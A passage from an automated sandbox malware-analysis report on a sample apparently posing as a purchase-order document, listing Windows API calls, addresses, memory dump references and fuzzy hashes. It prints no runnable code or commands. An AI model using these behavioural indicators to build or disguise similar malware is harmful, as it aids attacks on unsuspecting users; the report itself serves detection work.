                                                              • Opcode ID: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
                                                              • Instruction ID: 092ce593f34d4cefb17b57a654468e4a57f6b0d243feea45f1431905bdcf8400
                                                              • Opcode Fuzzy Hash: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
                                                              • Instruction Fuzzy Hash: 6F01F431B24210ABE7295B389C05B6A3698E710314F10863FF911F62F1DA78DC13CB4D
                                                              APIs
                                                                • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000002DA,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F4
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004022FD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: CloseDeleteOpenValue
                                                              • String ID:
                                                              • API String ID: 849931509-0
                                                              • Opcode ID: 77255f357ee36c0e17c9fba5f7ad704e0e223fd683348d0f5e4e34767849a248
                                                              • Instruction ID: 38b5be8bce117af921f4e5ecf87b48473febfbb911f594cd731ca38f4e60318c
                                                              • Opcode Fuzzy Hash: 77255f357ee36c0e17c9fba5f7ad704e0e223fd683348d0f5e4e34767849a248
                                                              • Instruction Fuzzy Hash: 30F06272A04210ABEB15AFF59A4EBAE7278DB44318F20453BF201B71D1D5FC5D028A7D
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ShowWindow
                                                              • String ID:
                                                              • API String ID: 1268545403-0
                                                              • Opcode ID: 4e05bc348ce61fbea98004c31f477e713a946defa61b8302a115f041240983d3
                                                              • Instruction ID: 75f1c009598274424d440b05a3ad8c81c52a8946c909ad9098faf089b9281bcd
                                                              • Opcode Fuzzy Hash: 4e05bc348ce61fbea98004c31f477e713a946defa61b8302a115f041240983d3
                                                              • Instruction Fuzzy Hash: 2DE04FB2B101049BCB64CBA8ED808FEB7A5AB48314B60453FE902B3290C675AC11CF28
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe,80000000,00000003), ref: 00405BFC
                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405C1E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: File$AttributesCreate
                                                              • String ID:
                                                              • API String ID: 415043291-0
                                                              • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                              • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                                                              • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                              • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,?,004057D8,?,?,00000000,004059AE,?,?,?,?), ref: 00405BD8
                                                              • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405BEC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
                                                              • Instruction ID: fe29290311b7cb81c7d613108583476726ae082aee9c7ce991490029c956b0b8
                                                              • Opcode Fuzzy Hash: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
                                                              • Instruction Fuzzy Hash: 04D0C976908020ABC2102B28AE0889BBB65DB542717018B31FA65A22B0C7305C52DAA6
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000), ref: 10002963
                                                              • GetLastError.KERNEL32 ref: 10002A6A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2369517507.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2369497623.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2369537423.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2369556194.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: AllocErrorLastVirtual
                                                              • String ID:
                                                              • API String ID: 497505419-0
                                                              • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                              • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                              • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                              • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402713
                                                                • Part of subcall function 00405ED3: wsprintfW.USER32 ref: 00405EE0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: FilePointerwsprintf
                                                              • String ID:
                                                              • API String ID: 327478801-0
                                                              • Opcode ID: 8a12d942855201ad551ff6b8522964b2a85f1590b66411236d4fcde10ada766a
                                                              • Instruction ID: c1a7dfb6bf4929fe1d7a037cd3c1fce150a4b9cbb888a554fff21e85dc6fb100
                                                              • Opcode Fuzzy Hash: 8a12d942855201ad551ff6b8522964b2a85f1590b66411236d4fcde10ada766a
                                                              • Instruction Fuzzy Hash: 4DE01AB1B10114ABDB01ABE59D49CFFB66CEB40318F20083BF101B00D1C27949019A7E
                                                              APIs
                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040228A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringWrite
                                                              • String ID:
                                                              • API String ID: 390214022-0
                                                              • Opcode ID: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                              • Instruction ID: 4332bbb19f5efe4f35bb732f6f353b7f8865d75a24debaa01da2fd7198b4a795
                                                              • Opcode Fuzzy Hash: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                              • Instruction Fuzzy Hash: 18E04F329041246ADB113EF20E8DE7F31689B44718B24427FF551BA1C2D5BC1D434669
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(00000000,000002DA,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Open
                                                              • String ID:
                                                              • API String ID: 71445658-0
                                                              • Opcode ID: b8abee58de6a0be5eb9c5c198a3cab6a4ba6a66a5c1950069b28e2d3a299ffdb
                                                              • Instruction ID: 330ade1cb5eaca6017f72c73cdc8309555cb727b7ded56d963bee508ab8c6b31
                                                              • Opcode Fuzzy Hash: b8abee58de6a0be5eb9c5c198a3cab6a4ba6a66a5c1950069b28e2d3a299ffdb
                                                              • Instruction Fuzzy Hash: A2E04676290108BADB00EFA4EE4AF9A77ECEB18704F008421B608E6091C774E9408BA8
                                                              APIs
                                                              • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C8F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                              • Instruction ID: 39c184252658266456f323190e8639734e0c032000ef403b7d50d3af51f805c1
                                                              • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                              • Instruction Fuzzy Hash: 68E08632108659ABEF105E508C00AEB3B5CEB04754F004832F911E3140D234E8118BA4
                                                              APIs
                                                              • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2369517507.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2369497623.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2369537423.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2369556194.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                              • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                              • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                              • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                              APIs
                                                              • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileString
                                                              • String ID:
                                                              • API String ID: 1096422788-0
                                                              • Opcode ID: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                                              • Instruction ID: 80fa8228d7b44b53eec3e7c38ed93a9451a1703e345daa2b135a9f68ba926bbf
                                                              • Opcode Fuzzy Hash: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                                              • Instruction Fuzzy Hash: 38E04F30800204BADB00AFA0CD49EAE3B78BF11344F20843AF581BB0D1E6B895809759
                                                              APIs
                                                              • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: 68a001bc1327843e2883382ea1a3ef1d27013be19fa5e5411c30e9fb0f16b135
                                                              • Instruction ID: 73733a4af0cc64661bb0b95da8c6c6dbb498264e8b287c2b288e90457a890fe4
                                                              • Opcode Fuzzy Hash: 68a001bc1327843e2883382ea1a3ef1d27013be19fa5e5411c30e9fb0f16b135
                                                              • Instruction Fuzzy Hash: B8D012B2B08100D7CB10DFE59A08ADDB765AB50329F304A77D111F21D0D2B885419A3A
                                                              APIs
                                                              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                              • Instruction ID: 838c4c0eb33ef43ad7257432987c28a2a788b3f909dd0a51a4998ccc95d90969
                                                              • Opcode Fuzzy Hash: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                              • Instruction Fuzzy Hash: 57C09B717443017BDB308B509D49F1777556754B00F1488397700F50E0CA74E452D62D
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: FilePointer
                                                              • String ID:
                                                              • API String ID: 973152223-0
                                                              • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                              • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                                              • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                              • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                                              APIs
                                                              • SendMessageW.USER32(00000028,?,?,00403FFB), ref: 004041DD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                                              • Instruction ID: c6b71f3973dfff953bb7db756b4a53cf392e498aed0f9e65811aff82f73edd61
                                                              • Opcode Fuzzy Hash: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                                              • Instruction Fuzzy Hash: 81B09235684200BADA214B00ED09F867A62A768701F008864B300240B0C6B244A2DB19
                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(?,00403F94), ref: 004041C6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID:
                                                              • API String ID: 2492992576-0
                                                              • Opcode ID: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
